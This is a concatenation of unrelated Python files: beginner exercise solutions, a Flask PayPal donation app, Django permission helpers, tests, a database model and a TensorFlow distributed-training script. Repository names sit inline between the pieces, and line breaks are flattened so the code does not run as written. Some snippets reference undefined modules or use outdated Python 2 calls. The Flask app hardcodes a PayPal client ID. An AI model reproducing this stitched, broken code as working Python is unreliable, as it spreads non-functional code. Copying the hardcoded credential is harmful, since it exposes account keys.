0 elif 15528 <= income <= 42707: percent = 15 elif 42708 <= income <= 132406: percent = 25 else: percent = 28 calculated_tax = 
income * percent / 100 print(f'The tax for {income} is {percent}%. That is {round(calculated_tax)} dollars!') # -------------------------------------------- word = input() dictionary = ["aa", "abab", "aac", "ba", "bac", "baba", "cac", "caac"] if word in dictionary: print("Correct") else: print("Incorrect") # -------------------------------------------- year = int(input()) if (year % 4 == 0 and year % 100 != 0) or year % 400 == 0: print("Leap") else: print("Ordinary") # -------------------------------------------- i = float(input()) if i < 2: print('Analytic') elif i <= 3: print('Synthetic') else: print('Polysynthetic') # -------------------------------------------- a, b, h = (int(input()) for i in range(3)) if h < a: print("Deficiency") elif h > b: print("Excess") else: print("Normal") # -------------------------------------------- spin, charge = (input() for i in range(2)) class_ = 'Quark' if spin == '1': particle = 'Photon' class_ = 'Boson' elif charge == '0': particle = 'Muon' class_ = 'Lepton' elif charge == '-1': particle = 'Electron' class_ = 'Lepton' elif charge == '2/3': particle = 'Charm' elif charge == '-1/3': particle = 'Strange' print(f'{particle} {class_}') # -------------------------------------------- k = int(input()) print((k * (k + 1)) // 2) # -------------------------------------------- n = int(input()) i = 2 while i < n: print(i) i += 2 # -------------------------------------------- string = "red yellow fox bite orange goose beeeeeeeeeeep" vowels = 'aeiou' count = 0 for letter in string: if letter in vowels: count += 1 # -------------------------------------------- count = int(input()) sum_ = 0 for _ in range(count): sum_ += int(input()) print(sum_ / count) # -------------------------------------------- word = input() for char in word: if char.isupper(): word = word.replace(char, '_' + char.lower()) print(word) # -------------------------------------------- consonants = 'bcdfghjklmnpqrstvwxyz' vowels = 'aeiou' sequence = input() for char in sequence: if char in vowels: print('vowel') elif char in consonants: print('consonant') else: break # -------------------------------------------- supremus_cat_cafe = ['', 0] while True: cafe = input().split() if cafe[0] == 'MEOW': break if int(cafe[1]) >= supremus_cat_cafe[1]: supremus_cat_cafe[1] = int(cafe[1]) supremus_cat_cafe[0] = cafe[0] print(supremus_cat_cafe[0]) # -------------------------------------------- from math import factorial x = int(input()) print(factorial(x)) # -------------------------------------------- import string print(string.digits + '\n' + string.ascii_lowercase) # -------------------------------------------- from random import seed, randint n = int(input()) seed(a=n, version=2) print(randint(-100, 100)) # -------------------------------------------- import random random.seed(int(input())) print(random.choice('Voldemort')) # -------------------------------------------- import random random.seed(3) print(random.betavariate(0.9, 0.1)) # -------------------------------------------- import random sentence = input().split() random.seed(43) random.shuffle(sentence) print(' '.join(sentence)) # -------------------------------------------- class Angel: color = "white" feature = "wings" home = "Heaven" class Demon: color = "red" feature = "horns" home = "Hell" little_angel = Angel() little_demon = Demon() little_kids = (little_angel, little_demon) for kid in little_kids: print(f'{kid.color}\n{kid.feature}\n{kid.home}') # -------------------------------------------- class Human: species = 'Homo Sapiens' n_legs = 2 
n_arms = 2 # -------------------------------------------- class RockBand: genre, n_members, key_instruments = 'rock', 4, ['electric guitar', 'drums'] tampikos = RockBand() print(f'{tampikos.genre}\n{tampikos.n_members}\n{tampikos.key_instruments}') # -------------------------------------------- class Store: def __init__(self, name, category): self.name = name self.category = category shop = Store("GAP", "clothes") print(shop.name, shop.category) # -------------------------------------------- class Movie: def __init__(self, title, director, year): self.title, self.director, self.year = title, director, year titanic, star_wars, fight_club = (Movie('Titanic', '', '1997'), Movie('Star Wars', '', '1977'), Movie('Fight Club', '', '1999')) # -------------------------------------------- class Student: def __init__(self, name, last_name, birth_year): self.name, self.last_name, self.birth_year = name, last_name, birth_year self.id = f'{name[0]}{last_name}{birth_year}' n, ln, by = (input() for i in range(3)) student = Student(n, ln, by) print(student.id) # -------------------------------------------- class Mountain: def __init__(self, name, height): self.name = name self.height = height def convert_height(self): return self.height / 0.3048 # -------------------------------------------- class Hexagon: def __init__(self, side_length): self.side_length = side_length def get_area(self): return round((3 * math.sqrt(3) * self.side_length ** 2) / 2, 3) # -------------------------------------------- class Point: def __init__(self, xx, yy): self.xx = xx self.yy = yy def dist(self, another_instance): return math.sqrt((self.xx - another_instance.xx) ** 2 + (self.yy - another_instance.yy) ** 2) # -------------------------------------------- class House: def __init__(self, floors): self.floors = floors self.color = None def paint(self, color): self.color = color # -------------------------------------------- class Stack(): def __init__(self): self.my_stack = [] def push(self, el): self.my_stack.append(el) def pop(self): delete = self.peek() self.my_stack.remove(delete) return delete def peek(self): return self.my_stack[-1] def is_empty(self): return bool(not self.my_stack) # -------------------------------------------- class PiggyBank: def __init__(self, dollars, cents): self.dollars = dollars self.cents = cents def add_money(self, deposit_dollars, deposit_cents): self.dollars += deposit_dollars self.cents += deposit_cents while self.cents > 99: self.cents -= 100 self.dollars += 1 piggy1 = PiggyBank(2, 2) def create_piggy(dollars, cents): return {'dollars': dollars, 'cents': cents} piggy2 = create_piggy(2, 2) # -------------------------------------------- print(' \n'.join('You are the best programmer!'.split())) # -------------------------------------------- print(len('That is \n mine')) # -------------------------------------------- print('\\\\') # -------------------------------------------- print(str(45 / 9 + 16 * (5 + 8))) print('mathematics') # -------------------------------------------- print(""" I am = I'm I have = I've I will = I'll I had / would = I'd """) # -------------------------------------------- print("What would I watch tonight?") fave_tv_show = 'Re:ゼロ' my_answer = fave_tv_show # -------------------------------------------- age = 20 if age < 18: print("You can't watch Game of Thrones!") else: print("You are welcome to be here. 
Sit, have a drink and enjoy the show!") # -------------------------------------------- print(input().upper()) # -------------------------------------------- print(input().strip(',.!?').lower()) # -------------------------------------------- marks = ',.!?' preprocess = ''.join(list(filter(lambda x: x not in marks, input()))) print(preprocess.lower()) # -------------------------------------------- def create_full_name(name, last_name): return f'{name} {last_name}' name1, last_name1 = "John", "Lennon" full_name1 = create_full_name(name1, last_name1) name2, last_name2 = "Hermione", "Granger" full_name2 = create_full_name(name2, last_name2) name3, last_name3 = "Lady", "Gaga" full_name3 = create_full_name(name3, last_name3) # -------------------------------------------- def f1(x): return x ** 2 + 1 def f2(x): return 1 / x ** 2 def f3(x): return x ** 2 - 1 def f(x): if x <= 0: return f1(x) if 0 < x < 1: return f2(x) return f3(x) # -------------------------------------------- def fahrenheit_to_celsius(temps_f): temps_c = (temps_f - 32) * 5 / 9 return round(temps_c, 2) def celsius_to_fahrenheit(temps_c): temps_f = temps_c * 9 / 5 + 32 return round(temps_f, 2) def main(): """Entry point of the program.""" temperature, unit = input().split() # read the input temperature = float(temperature) if unit == 'F': print(f'{fahrenheit_to_celsius(temperature)} C') else: print(f'{celsius_to_fahrenheit(temperature)} F') # -------------------------------------------- hand = [input() for i in range(6)] face_cards = {'Jack': 11, 'Queen': 12, 'King': 13, 'Ace': 14} rank = 0 for card in hand: if card not in face_cards: rank += int(card) else: rank += face_cards[card] rank /= 6 print(rank) # -------------------------------------------- words = input().lower().split() word_amount = dict() for word in words: if word not in word_amount: word_amount[word] = 1 else: word_amount[word] += 1 for word, count in word_amount.items(): print(f'{word} {count}') # -------------------------------------------- f, s = (float(input()) for i in range(2)) print('{}'.format(f + s)) # -------------------------------------------- x, y = input().split() print(f'{x} of {y}') # -------------------------------------------- random_numbers = [1, 22, 333, 4444, 55555] for index, random in enumerate(random_numbers): random_numbers[index] = str(random) print("\n".join(random_numbers)) # -------------------------------------------- random_numbers = [1, 22, 333, 4444, 55555] print("\n".join(map(str, random_numbers))) # -------------------------------------------- print(''.join([word.title() for word in input().lower().split('_')])) # -------------------------------------------- # safe_main_module.py name = "Juan" def main(): print("Hello,", name) if __name__ == "__main__": main() # -------------------------------------------- import datetime birthday = datetime.datetime(2002, 5, 27) # -------------------------------------------- some_date = datetime.datetime(3486, 5, 15, 23, 59) print(some_date.time()) # -------------------------------------------- import datetime now_time = datetime.datetime.now() # -------------------------------------------- import math def my_sqrt(value): if isinstance(value, str): return "The string should be converted into a numeric data type" if not isinstance(value, (int, float)): return None return math.sqrt(value) # -------------------------------------------- file = open('test_file.txt', 'r', encoding='utf-16') print(file.readline()) file.close() # -------------------------------------------- # First letter from each line. 
file = open('test.txt', 'r') for line in file: print(line[0]) file.close() # -------------------------------------------- file = open('sums.txt', 'r') for line in file: numbers = line.strip('\n').split() for i, number in enumerate(numbers): numbers[i] = int(number) print(sum(numbers)) file.close() # -------------------------------------------- file = open('sums.txt', 'r') for line in file: print(sum(int(x) for x in line.split())) file.close() # -------------------------------------------- file = open('input.txt', 'w', encoding='utf-8') file.write(input()) file.close() # -------------------------------------------- with open('input.txt', 'w') as f: f.write(input()) # -------------------------------------------- with open('planets.txt', 'w', encoding='utf-8') as file: planets = ['Mercury', 'Venus', 'Earth', 'Mars', 'Jupiter', 'Saturn', 'Uranus', 'Neptune'] for planet in planets: file.write(planet + '\n') # -------------------------------------------- with open('animals.txt') as file: animals = file.readlines() animals = [animal.replace('\n', '') for animal in animals] new_file = open('animals_new.txt', 'w') new_file.write(' '.join(animals)) new_file.close() # -------------------------------------------- with open('test.txt', 'w') as f: f.write('Tada!') # -------------------------------------------- with open('name.txt') as f1, open('surname.txt') as f2, open('full_name.txt', 'w') as f3: name = f1.read() surname = f2.read() full_name = name + ' ' + surname f3.write(full_name) # -------------------------------------------- for i in range(1, 11): with open(f'file{i}.txt', 'w') as file: file.write(str(i)) # -------------------------------------------- import json colors = {"rainbow": ["red", "orange", "yellow", "green", "blue", "indigo", "violet"], "CMYK": ["cyan", "magenta", "yellow", "key color"], "RBG": ["red", "blue", "green"]} json_colors = json.dumps(colors, indent=4) with open('colors.json', 'w') as json_file: json_file.write(json_colors) # -------------------------------------------- import json colors = {"rainbow": ["red", "orange", "yellow", "green", "blue", "indigo", "violet"], "CMYK": ["cyan", "magenta", "yellow", "key color"], "RBG": ["red", "blue", "green"]} with open("colors.json", "w") as file: json.dump(colors, file) # -------------------------------------------- import json json_string = input() json_dict = json.loads(json_string) print(f'{type(json_dict)}\n{json_dict}') # -------------------------------------------- with open('users.json', 'r') as json_file: dict_from_json = json.load(json_file) users_defined = len(dict_from_json['users']) print(users_defined) # -------------------------------------------- template = """

{{ blog_name }}

""" # -------------------------------------------- template = """
  {% for todo in todos %}
  • {{ todo }}
  {% endfor %}
""" # -------------------------------------------- template = """
{% if post.author is not none %} {{ post.text }} {% else %} No author {% endif %}
""" # -------------------------------------------- add_book(title='SAO') # -------------------------------------------- def get_bonus(salary, percentage=35): return int(salary * percentage / 100) # -------------------------------------------- def get_percentage(real, round_digits=None): percentage = real * 100 return f'{round(percentage, round_digits)}%' # -------------------------------------------- shopping_list = [] shopping_list.append("milk") shopping_list.append("olive oil") shopping_list.append("bananas") shopping_list.remove("milk") shopping_list.append("brownie") # -------------------------------------------- shopping_list = [] shopping_list.append('milk') shopping_list.append('olive oil') shopping_list.append('bananas') shopping_list[0] = 'brownie' # -------------------------------------------- n = int(input()) list_ = [int(input()) for _i in range(n)] print(list_) # -------------------------------------------- from django.shortcuts import redirect, Http404 from django.views import View class TodoView(View): all_todos = [] def delete(self, request, to_do, *args, **kwargs): if to_do not in self.all_todos: raise Http404 self.all_todos.remove(to_do) return redirect('/') # -------------------------------------------- from django.shortcuts import redirect from django.views import View class TodoView(View): all_todos = [] def post(self, request, *args, **kwargs): to_do = request.POST.get('todo') if to_do not in self.all_todos: self.all_todos.append(to_do) return redirect('/') # -------------------------------------------- from django.shortcuts import redirect from django.views import View class TodoView(View): all_todos = [] def post(self, request, *args, **kwargs): to_do = request.POST.get('todo') is_important = request.POST.get('important') if to_do not in self.all_todos: self.all_todos.insert(0, to_do) if is_important else self.all_todos.append(to_do) return redirect('/') # -------------------------------------------- from django.shortcuts import redirect from django.views import View class TodoView(View): all_todos = [] def post(self, request, *args, **kwargs): to_do = request.POST.get('todo') is_important = request.POST.get('important') if to_do not in self.all_todos: if is_important: self.all_todos.insert(0, to_do) else: self.all_todos.append(to_do) return redirect('/') # -------------------------------------------- prices = input().split() print(prices[3 - 1]) # -------------------------------------------- numbers = [4, 1, 0, 3, 2, 5] for i, _ in enumerate(numbers): numbers[i] = i print(numbers) # -------------------------------------------- numbers = tuple(int(n) for n in input().split()) print(numbers[-1]) # -------------------------------------------- oceans = ['Atlantic', 'Pacific', 'Indian', 'Southern', 'Arctic'] oceans = tuple(oceans) # -------------------------------------------- singleton = ([0, 1, 1, 2, 3, 5, 8, 13, 21],) # -------------------------------------------- print(sum(ord(input()) for _ in range(2))) # -------------------------------------------- print(''.join(chr(int(input())) for _ in range(4))) # -------------------------------------------- code = int(input()) print(chr(code) if 32 <= code <= 126 else False) # -------------------------------------------- zero_bytes = bytes(5) # -------------------------------------------- str_to_bytes = input().encode() print(str_to_bytes[-1]) # -------------------------------------------- message = input().encode() key = sum((int(input())).to_bytes(2, byteorder='big')) decoded = '' for character in message: decoded += 
chr(character + key) print(decoded) # -------------------------------------------- message = input().encode() key = sum((int(input())).to_bytes(2, byteorder='big')) decoded = ''.join(map(lambda x: chr(x + key), message)) print(decoded) # -------------------------------------------- import socket # Create socket. client_socket = socket.socket() # Address. hostname = 'localhost' port = 7070 address = (hostname, port) # Connect to server. client_socket.connect(address) # Prepare data. data = 'Neko' # Convert to bytes. data = data.encode() # Send data through socket. client_socket.send(data) # Receive the response. response = client_socket.recv(1024) # Decode bytes to string. response = response.decode() print(response) client_socket.close() # -------------------------------------------- import socket # Socket as a context manager. with socket.socket() as client_socket: hostname = '127.0.0.1' port = 9090 address = (hostname, port) client_socket.connect(address) data = 'Neko' data = data.encode() client_socket.send(data) response = client_socket.recv(1024) response = response.decode() print(response) # -------------------------------------------- import sys args = sys.argv # List of arguments. if len(args) != 3: print("The script should be called with two arguments, the first and the second number to be multiplied") else: first_num = float(args[1]) second_num = float(args[2]) product = first_num * second_num print("The product of " + args[1] + " times " + args[2] + " equals " + str(product)) # -------------------------------------------- my_list = args[1:] my_list = [int(i) for i in my_list] print(my_list) # -------------------------------------------- deposit = int(input()) years = 0 while deposit <= 700000: deposit += deposit * 0.071 years += 1 print(years) # -------------------------------------------- def my_function(x): return -1 if x < 0 else 1 # -------------------------------------------- lambda x: -1 if x < 0 else 1 # -------------------------------------------- func = (lambda x: 'even' if x % 2 == 0 else 'odd') # -------------------------------------------- a = 1 b = 2 c = 3 func = (lambda a, b, c: (a + b) * c) result = func(a, b, c) # -------------------------------------------- numbers = [int(n) for n in input()] less_than_5 = [n for n in numbers if n < 5] greater_than_5 = [n for n in numbers if n > 5] print(less_than_5) print(greater_than_5) # -------------------------------------------- digits = [int(n) for n in input() if int(n) % 2 == 1] print(digits) # -------------------------------------------- numbers = [int(n) for n in input()] running = [] accumulated = 0 for _, n in enumerate(numbers): running.append(n + accumulated) accumulated += n print(running) # -------------------------------------------- numbers = [int(n) for n in input()] running = [sum(numbers[0:i + 1]) for i in range(len(numbers))] print(running) # -------------------------------------------- def celsius_to_fahrenheit(c): return ((c + 40) * 1.8) - 40 daily_temp_c = [20.5, 19, 15, 25, 27, 30, 31, 29, 26, 21, 19, 25, 27.5, 28, 26, 29.5, 31, 27.5, 26, 29, 18, 17.5, 17, 16.5, 19, 20, 25, 26.5, 27, 28, 20.5, 19, 25, 27.5, 28, 26, 15, 25, 27, 28] daily_temp_f = list(map(celsius_to_fahrenheit, daily_temp_c)) temp_above_80 = list(filter(lambda x: x > 80, daily_temp_f)) print(len(temp_above_80)) # -------------------------------------------- scores_maths = [100, 75, 90, 95, 60, 50, 95, 85, 70, 75, 90, 85, 60, 45, 100, 70, 65, 50, 55, 95, 50, 45, 35, 100, 95, 90, 85, 90, 80, 85, 95, 45, 60, 45, 80, 70, 55, 45, 60, 90] 
scores_physics = [50, 65, 85, 100, 60, 55, 90, 85, 70, 90, 50, 40, 100, 45, 95, 70, 75, 60, 50, 100, 60, 90, 40, 90, 95, 90, 80, 95, 85, 80, 95, 90, 75, 50, 80, 70, 50, 35, 65, 90] scores_english = [50, 40, 100, 45, 95, 70, 75, 60, 50, 100, 50, 45, 35, 100, 95, 90, 85, 90, 80, 85, 90, 85, 60, 45, 100, 70, 65, 50, 55, 95, 50, 65, 85, 100, 60, 55, 90, 85, 70, 90] overall_scores = list(map(lambda x, y, z: x + y + z, scores_maths, scores_physics, scores_english)) admitted_students = list(filter(lambda x: x >= 270, overall_scores)) print(len(admitted_students)) # -------------------------------------------- even = [0, 2, 4, 6, 8] odd = [1, 3, 5, 7, 9] length = len(even) my_sum = [] i = 0 while i < length: my_sum.append(even[i] + odd[i]) i = i + 1 remainders = [x % 3 for x in my_sum] nonzero_remainders = [r for r in remainders if r] # -------------------------------------------- even = [0, 2, 4, 6, 8] odd = [1, 3, 5, 7, 9] my_sum = list(map(lambda x, y: x + y, even, odd)) remainders = list(map(lambda x: x % 3, my_sum)) nonzero_remainders = list(filter(lambda r: r, remainders)) # -------------------------------------------- numbers = [1, 2, 3] my_generator = (n ** 2 for n in numbers) print(next(my_generator)) # Outputs 1 print(next(my_generator)) # Outputs 4 print(next(my_generator)) # Outputs 9 my_list = [n ** 2 for n in numbers] print(my_list) # Outputs [1, 4, 9] my_generator = (n ** 2 for n in numbers) for n in my_generator: print(n) # Outputs # 1 # 4 # 9 # -------------------------------------------- n = int(input()) def squares(times): i = 1 while i <= times: yield i ** 2 i += 1 _squares = squares(n) for n in _squares: print(n) # -------------------------------------------- n = int(input()) def even(evens): i = 0 while i < evens: yield i * 2 i += 1 _evens = even(n) for n in _evens: print(n) # -------------------------------------------- for a, b in zip(v1, v2): x = a + b print(x) # -------------------------------------------- for e_word, s_word, f_word in zip(english, spanish, french): print(e_word, s_word, f_word) # -------------------------------------------- word_1, word_2 = (input() for i in range(2)) brand_name = '' for letter_1, letter_2 in zip(word_1, word_2): brand_name += letter_1 + letter_2 print(brand_name) # -------------------------------------------- import itertools for first_name, middle_name in itertools.product(first_names, middle_names): print(first_name, middle_name) # -------------------------------------------- import itertools teams = ['Best-ever', 'Not-so-good', 'Amateurs'] for plays in itertools.combinations(teams, 2): print(plays) # -------------------------------------------- from itertools import combinations flower_names = ['rose', 'tulip', 'sunflower'] for r in range(1, 4): for bouquets in combinations(flower_names, r): print(bouquets) # -------------------------------------------- # -------------------------------------------- #!/usr/bin/python from flask import Flask, session, render_template, url_for, redirect, request, flash, g from flask.ext import assets import pyxb import json import json import os import paypalrestsdk app = Flask(__name__) paypal_client_id = "AacMHTvbcCGRzaeuHY6i6zwqGvveuhN4X_2sZ2mZJi76ZGtSZATh7XggfVuVixzyrRuG-bJTLOJIXltg" paypal_client_secret = "" #Assets env = assets.Environment(app) env.load_path = [ os.path.join(os.path.dirname(__file__), 'assets') ] env.register ( 'js_all', assets.Bundle( 'js/jquery.js', 'js/bootstrap.min.js', 'js/moment-with-locales.min.js', 'js/bootstrap-datetimepicker.min.js', 'js/slider.js', 'js/amounts.js', 
'js/landing.js', output='js_all.js' ) ) env.register( 'css_all', assets.Bundle( 'css/bootstrap.min.css', 'css/bootstrap-datetimepicker.min.css', 'css/slider.css', 'css/landing-page.css', output='css_all.css' ) ) # Paypal lib paypalrestsdk.configure( mode="sandbox", # sandbox or live client_id=paypal_client_id, client_secret= paypal_client_secret ) @app.route('/') def index(): return render_template('index.html') @app.route('/payment/donation/create', methods=["POST"]) def paypal_process(): amount = 0 categories = { 'amount-homeless': 'homeless people', 'amount-refugees': 'refugees people', 'amount-orphans': 'orphans people', 'amount-poverished': 'perverished people' } items = [] for key, value in categories.iteritems(): amount += float(request.form[key]) if request.form[key] != 0: items.append({ "name": "Donation to " + value, "price": "%.2f" % float(request.form[key]), "currency": "GBP", "quantity": 1 }) if amount == 0: raise Exception("Invalid amount") # Payment # A Payment Resource; create one using # the above types and intent as 'sale' payment = paypalrestsdk.Payment({ "intent": "sale", # Payer # A resource representing a Payer that funds a payment # Payment Method as 'paypal' "payer": { "payment_method": "paypal"}, # Redirect URLs "redirect_urls": { "return_url": "http://localhost:5000/payment/donation/done", "cancel_url": "http://localhost:5000/"}, # Transaction # A transaction defines the contract of a # payment - what is the payment for and who # is fulfilling it. "transactions": [{ # ItemList "item_list": { "items": items }, # Amount # Let's you specify a payment amount. "amount": { "total": "%.2f" % amount, "currency": "GBP" }, "description": "Donation to Railaid" }] }) print(payment) # Create Payment and return status if payment.create(): print("Payment[%s] created successfully" % (payment.id)) # Redirect the user to given approval url for link in payment.links: if link.method == "REDIRECT": # Convert to str to avoid google appengine unicode issue # https://github.com/paypal/rest-api-sdk-python/pull/58 redirect_url = str(link.href) return redirect(redirect_url) else: print(payment.error) @app.route('/payment/donation/done') def paypal_success(): # Don't know what to do with it for now payment_id = request.args.get('paymentId') payment = paypalrestsdk.Payment.find(payment_id) print(payment.transactions[0].amount.total); return "Thank you for your donation of " + payment.transactions[0].amount.total + "!" 
# @app.route('/search/tickets') # def search_tickets(): # p1 = Passenger(age=30) # # tp1 = TravelPoint( # origin="GBQQU", # destination="GBQQM", # departure=datetime(2015, 11, 23, 8)) # # fq = FareSearch( # travel_points = [tp1], # fare_filter = FARE_FILTER.CHEAPEST, # passengers = [p1]) # # fares_result = sc.search_fare(fq) # fr = fares_result.results # print(fr) # return render_template('search-result.html', data=fr) if __name__ == '__main__': app.run(debug=True) from fastapi import FastAPI,Request from fastapi.testclient import TestClient from app.main import app client = TestClient(app) def test_health(): response = client.get("/users/health-check") assert response.status_code == 200 assert response.json() == {"Message":'healthy user endpoint'}dkopitsa/django-permission # coding=utf-8 """ Permission logic utilities """ from __future__ import unicode_literals from permission.logics import PermissionLogic def add_permission_logic(model, permission_logic): """ Add permission logic to the model Parameters ---------- model : django model class A django model class which will be treated by the specified permission logic permission_logic : permission logic instance A permission logic instance which will be used to determine permission of the model Examples -------- >>> from django.db import models >>> from permission.logics import PermissionLogic >>> class Mock(models.Model): ... name = models.CharField('name', max_length=120) >>> add_permission_logic(Mock, PermissionLogic()) """ if not isinstance(permission_logic, PermissionLogic): raise AttributeError( '`permission_logic` must be an instance of PermissionLogic') if not hasattr(model, '_permission_logics'): model._permission_logics = set() if not hasattr(model, '_permission_handler'): from permission.utils.handlers import registry # register default permission handler registry.register(model, handler=None) model._permission_logics.add(permission_logic) # store target model to the permission_logic instance permission_logic.model = model def remove_permission_logic(model, permission_logic, fail_silently=True): """ Remove permission logic to the model Parameters ---------- model : django model class A django model class which will be treated by the specified permission logic permission_logic : permission logic class or instance A permission logic class or instance which will be used to determine permission of the model fail_silently : boolean If `True` then do not raise KeyError even the specified permission logic have not registered. Examples -------- >>> from django.db import models >>> from permission.logics import PermissionLogic >>> class Mock(models.Model): ... 
name = models.CharField('name', max_length=120) >>> logic = PermissionLogic() >>> add_permission_logic(Mock, logic) >>> remove_permission_logic(Mock, logic) """ if not hasattr(model, '_permission_logics'): model._permission_logics = set() if not isinstance(permission_logic, PermissionLogic): # remove all permission logic of related remove_set = set() for _permission_logic in model._permission_logics: if _permission_logic.__class__ == permission_logic: remove_set.add(_permission_logic) # difference model._permission_logics = model._permission_logics.difference(remove_set) else: if fail_silently and permission_logic not in model._permission_logics: pass else: model._permission_logics.remove(permission_logic) dustindall/footings import pytest from footings.scenario_registry import ( ScenarioRegistry, def_attribute, scenario_registry, ) class TestScenarioRegistry: @scenario_registry class Scenarios: sens_1 = def_attribute(default=1, dtype=int, description="Sensitivity 1") sens_2 = def_attribute(default=2, dtype=int, description="Sensitivity 2") def test_init(self): assert isinstance(self.Scenarios, ScenarioRegistry) assert self.Scenarios.sens_1 == 1 assert self.Scenarios.sens_2 == 2 assert list(self.Scenarios.registry.keys()) == ["base"] def test_register(self): @self.Scenarios.register class update_1: sens_1 = 2 @self.Scenarios.register class update_2: sens_2 = 3 @self.Scenarios.register class update_3: sens_1 = 2 sens_2 = 3 assert list(self.Scenarios.registry.keys()) == [ "base", "update_1", "update_2", "update_3", ] with pytest.raises(TypeError): @self.Scenarios.register class update_4: sens_1 = 2 sens_2 = 3 sens_3 = 4 with pytest.raises(TypeError): @self.Scenarios.register class update_5: sens_1 = "hello" def test_get(self): assert self.Scenarios.get("base") == {"sens_1": 1, "sens_2": 2} assert self.Scenarios.get("update_1") == {"sens_1": 2, "sens_2": 2} assert self.Scenarios.get("update_2") == {"sens_1": 1, "sens_2": 3} assert self.Scenarios.get("update_3") == {"sens_1": 2, "sens_2": 3} def test_scenario_keys(self): assert list(self.Scenarios.scenario_keys()) == [ "base", "update_1", "update_2", "update_3", ] def test_scenario_items(self): assert self.Scenarios.scenario_items() == { "base": {"sens_1": 1, "sens_2": 2}, "update_1": {"sens_1": 2, "sens_2": 2}, "update_2": {"sens_1": 1, "sens_2": 3}, "update_3": {"sens_1": 2, "sens_2": 3}, } def test_doc(self): pass politics/models/bill.py from . import db, ma class Bill(db.Model): id = db.Column(db.Integer, primary_key=True) assembly_id = db.Column(db.Integer) name = db.Column(db.String(120)) status = db.Column(db.String(30)) sponser = db.Column(db.String(50)) proposed_date = db.Column(db.DateTime) decision_date = db.Column(db.DateTime) is_processed = db.Boolean() def __repr__(self): return self.name class BillListSchema(ma.ModelSchema): class Meta: model = Bill bill_list_schema = BillListSchema(many=True) scotthuang1989/mytensorflow_example_code # Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
# ============================================================================== from __future__ import print_function import math import os import tensorflow as tf from tensorflow.examples.tutorials.mnist import mnist flags = tf.app.flags # Flags for configuring the task flags.DEFINE_string("job_name", None, "job name: worker or ps") flags.DEFINE_integer("task_index", 0, "Worker task index, should be >= 0. task_index=0 is " "the chief worker task the performs the variable " "initialization") flags.DEFINE_string("ps_hosts", "", "Comma-separated list of hostname:port pairs") flags.DEFINE_string("worker_hosts", "", "Comma-separated list of hostname:port pairs") # Training related flags flags.DEFINE_string("data_dir", None, "Directory where the mnist data is stored") flags.DEFINE_string("train_dir", None, "Directory for storing the checkpoints") flags.DEFINE_integer("hidden1", 128, "Number of units in the 1st hidden layer of the NN") flags.DEFINE_integer("hidden2", 128, "Number of units in the 2nd hidden layer of the NN") flags.DEFINE_integer("batch_size", 100, "Training batch size") flags.DEFINE_float("learning_rate", 0.01, "Learning rate") FLAGS = flags.FLAGS TRAIN_FILE = "train.tfrecords" def read_and_decode(filename_queue): reader = tf.TFRecordReader() _, serialized_example = reader.read(filename_queue) features = tf.parse_single_example( serialized_example, # Defaults are not specified since both keys are required. features={ 'image_raw': tf.FixedLenFeature([], tf.string), 'label': tf.FixedLenFeature([], tf.int64), }) # Convert from a scalar string tensor (whose single string has # length mnist.IMAGE_PIXELS) to a uint8 tensor with shape # [mnist.IMAGE_PIXELS]. image = tf.decode_raw(features['image_raw'], tf.uint8) image.set_shape([mnist.IMAGE_PIXELS]) # OPTIONAL: Could reshape into a 28x28 image and apply distortions # here. Since we are not applying any distortions in this # example, and the next step expects the image to be flattened # into a vector, we don't bother. # Convert from [0, 255] -> [-0.5, 0.5] floats. image = tf.cast(image, tf.float32) * (1. / 255) - 0.5 # Convert label from a scalar uint8 tensor to an int32 scalar. label = tf.cast(features['label'], tf.int32) return image, label def inputs(batch_size): """Reads input data. Args: batch_size: Number of examples per returned batch. Returns: A tuple (images, labels), where: * images is a float tensor with shape [batch_size, mnist.IMAGE_PIXELS] in the range [-0.5, 0.5]. * labels is an int32 tensor with shape [batch_size] with the true label, a number in the range [0, mnist.NUM_CLASSES). """ filename = os.path.join(FLAGS.data_dir, TRAIN_FILE) with tf.name_scope('input'): filename_queue = tf.train.string_input_producer([filename]) # Even when reading in multiple threads, share the filename # queue. image, label = read_and_decode(filename_queue) # Shuffle the examples and collect them into batch_size batches. # (Internally uses a RandomShuffleQueue.) # We run this in two threads to avoid being a bottleneck. images, sparse_labels = tf.train.shuffle_batch( [image, label], batch_size=batch_size, num_threads=2, capacity=1000 + 3 * batch_size, # Ensures a minimum amount of shuffling of examples. min_after_dequeue=1000) return images, sparse_labels def device_and_target(): # If FLAGS.job_name is not set, we're running single-machine TensorFlow. # Don't set a device. if FLAGS.job_name is None: print("Running single-machine training") return (None, "") # Otherwise we're running distributed TensorFlow. 
print("Running distributed training") if FLAGS.task_index is None or FLAGS.task_index == "": raise ValueError("Must specify an explicit `task_index`") if FLAGS.ps_hosts is None or FLAGS.ps_hosts == "": raise ValueError("Must specify an explicit `ps_hosts`") if FLAGS.worker_hosts is None or FLAGS.worker_hosts == "": raise ValueError("Must specify an explicit `worker_hosts`") cluster_spec = tf.train.ClusterSpec({ "ps": FLAGS.ps_hosts.split(","), "worker": FLAGS.worker_hosts.split(","), }) print(cluster_spec) server = tf.train.Server( cluster_spec, job_name=FLAGS.job_name, task_index=FLAGS.task_index) if FLAGS.job_name == "ps": server.join() worker_device = "/job:worker/task:{}".format(FLAGS.task_index) # The device setter will automatically place Variables ops on separate # parameter servers (ps). The non-Variable ops will be placed on the workers. return ( tf.train.replica_device_setter( worker_device=worker_device, cluster=cluster_spec), server.target, ) def main(unused_argv): if FLAGS.data_dir is None or FLAGS.data_dir == "": raise ValueError("Must specify an explicit `data_dir`") if FLAGS.train_dir is None or FLAGS.train_dir == "": raise ValueError("Must specify an explicit `train_dir`") device, target = device_and_target() with tf.device(device): images, labels = inputs(FLAGS.batch_size) logits = mnist.inference(images, FLAGS.hidden1, FLAGS.hidden2) loss = mnist.loss(logits, labels) train_op = mnist.training(loss, FLAGS.learning_rate) # scott hooks=[tf.train.StopAtStepHook(last_step=100000)] mystep=0 with tf.train.MonitoredTrainingSession( master=target, is_chief=(FLAGS.task_index == 0), checkpoint_dir=FLAGS.train_dir,hooks=hooks) as sess: while not sess.should_stop(): mystep +=1 sess.run(train_op) with open(os.path.join(FLAGS.train_dir,"mystep.txt"),'a') as fd: fd.write(str(mystep) + "\n") if __name__ 